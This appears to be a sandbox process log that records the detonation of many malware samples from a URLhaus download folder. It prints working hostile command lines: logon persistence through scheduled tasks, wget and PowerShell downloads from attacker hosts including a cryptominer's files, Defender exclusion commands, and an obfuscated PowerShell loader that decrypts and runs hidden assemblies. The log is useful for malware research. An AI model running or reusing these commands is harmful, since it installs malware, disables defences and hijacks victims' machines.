C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 812
C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1020
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1048
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe"
C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552
C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe
"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkYwOUQ0OUEtRDIyNC00NEU1LTk1NjAtQkI5NDQ2MDEyM0QwfSIgdXNlcmlkPSJ7OTQ1MjhCNDgtNDg1RC00NjM3LUEyNDItNjcwQzUzRkUzRjY0fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0ZDQTVGOTA4LTgwMjktNDdCQi1BRjlELUI3RTVEMzA1RTk1MX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjM3MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zNTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxMjIzIi8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1968 -ip 1968
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{2F09D49A-D224-44E5-9560-BB94460123D0}"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1556
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
C:\Users\Admin\Downloads\UrlHausFiles\boot.exe
"C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E26.tmp\6E27.tmp\6E28.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1968 -ip 1968
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1644
C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"
C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1868
C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\test28.exe
"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\b.ps1"
C:\Users\Admin\Downloads\UrlHausFiles\random.exe
"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"
C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe
"C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe"
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
C:\Users\Admin\Downloads\UrlHausFiles\msf.exe
"C:\Users\Admin\Downloads\UrlHausFiles\msf.exe"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Users\Admin\AppData\Local\palladiums\translucently.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe
"C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe"
C:\Users\Admin\Downloads\UrlHausFiles\def.exe
"C:\Users\Admin\Downloads\UrlHausFiles\def.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 5716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 700
C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4748 -ip 4748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 732
C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe
"C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D30A.tmp\D30B.tmp\D30C.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"
C:\Users\Admin\AppData\Roaming\Bypass.exe
Bypass.exe
C:\Users\Admin\AppData\Local\Temp\Defender.exe
"C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80
C:\Users\Admin\Downloads\UrlHausFiles\key.exe
"C:\Users\Admin\Downloads\UrlHausFiles\key.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1572
C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe
"C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"
C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp" /SL5="$1501DA,3886989,54272,C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause coder_media_11281
C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe
"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i
C:\Users\Admin\Downloads\UrlHausFiles\7z.exe
"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause coder_media_11281
C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\win.exe
"C:\Users\Admin\Downloads\UrlHausFiles\win.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe
"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\ONHQNHFT.msi"
C:\Windows\SYSTEM32\rundll32.exe
rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run
C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe
"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe" /update "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe
"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe" /delete "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Downloads\UrlHausFiles\System.exe
"C:\Users\Admin\Downloads\UrlHausFiles\System.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd';$lAeq='GfZBCetCfZBCurfZBCrefZBCnfZBCtfZBCPrfZBCocfZBCefZBCsfZBCsfZBC'.Replace('fZBC', ''),'MaiPrpmnMoPrpmdPrpmulPrpmePrpm'.Replace('Prpm', ''),'CrIgJgeatIgJgeIgJgDeIgJgcIgJgryIgJgpIgJgtoIgJgrIgJg'.Replace('IgJg', ''),'EJqHmntJqHmrJqHmyPoJqHmintJqHm'.Replace('JqHm', ''),'EleDBwrmeDBwrntADBwrtDBwr'.Replace('DBwr', ''),'ChaFGFHnFGFHgFGFHeEFGFHxtFGFHeFGFHnsiFGFHonFGFH'.Replace('FGFH', ''),'TrFaEMansFaEMfoFaEMrmFaEMFinFaEMalBFaEMlFaEMockFaEM'.Replace('FaEM', ''),'IpACXnvpACXokpACXepACX'.Replace('pACX', ''),'Sssrbplissrbtssrb'.Replace('ssrb', ''),'DVGtReVGtRcomVGtRpreVGtRssVGtR'.Replace('VGtR', ''),'FroomPomBoomPasoomPe6oomP4SoomPtroomPingoomP'.Replace('oomP', ''),'ReaafWIdLafWIinafWIeafWIsafWI'.Replace('afWI', ''),'LIdMHoaIdMHdIdMH'.Replace('IdMH', ''),'CBGdXopBGdXyBGdXToBGdX'.Replace('BGdX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($lAeq[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function PvrJj($TpxZW){$NbCzo=[System.Security.Cryptography.Aes]::Create();$NbCzo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NbCzo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NbCzo.Key=[System.Convert]::($lAeq[10])('wn6tmbO/rOORgxj74qEsSdU2WhE4KPXIqhTJPDz2aPY=');$NbCzo.IV=[System.Convert]::($lAeq[10])('gHqzXB7DsEnzxXPGoUcHcg==');$PddqI=$NbCzo.($lAeq[2])();$ySKdP=$PddqI.($lAeq[6])($TpxZW,0,$TpxZW.Length);$PddqI.Dispose();$NbCzo.Dispose();$ySKdP;}function rEEVf($TpxZW){$QUakK=New-Object System.IO.MemoryStream(,$TpxZW);$zUBgT=New-Object System.IO.MemoryStream;$PwRDy=New-Object System.IO.Compression.GZipStream($QUakK,[IO.Compression.CompressionMode]::($lAeq[9]));$PwRDy.($lAeq[13])($zUBgT);$PwRDy.Dispose();$QUakK.Dispose();$zUBgT.Dispose();$zUBgT.ToArray();}$lkrNY=[System.IO.File]::($lAeq[11])([Console]::Title);$aZZTu=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 5).Substring(2))));$cSjRs=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 6).Substring(2))));[System.Reflection.Assembly]::($lAeq[12])([byte[]]$cSjRs).($lAeq[3]).($lAeq[7])($null,$null);[System.Reflection.Assembly]::($lAeq[12])([byte[]]$aZZTu).($lAeq[3]).($lAeq[7])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Users\Admin\AppData\Local\Temp\._cache_System.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\Downloads\UrlHausFiles\bp.exe
"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAFIEGIECGCB" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\c3pool7.bat" "
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe'
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1976
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Program Files\Google\Chrome\Application\chrome.exe
